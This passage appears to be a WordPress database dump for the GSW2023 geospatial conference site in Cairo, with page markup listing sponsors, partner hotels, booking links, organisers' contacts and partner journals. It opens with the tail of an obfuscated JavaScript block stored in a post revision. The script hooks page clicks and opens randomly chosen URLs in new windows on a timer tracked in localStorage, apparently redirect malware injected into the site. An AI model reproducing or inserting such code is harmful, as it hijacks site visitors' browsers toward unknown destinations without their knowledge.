_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 03:14:17','2023-08-16 03:14:17','',3066,'https://gsw2023.com/?p=5285',0,'revision','',0),
(5286,1,'2023-08-16 03:14:57','2023-08-16 03:14:57','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155359389{margin-top: 85px !important;margin-right: -85px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text 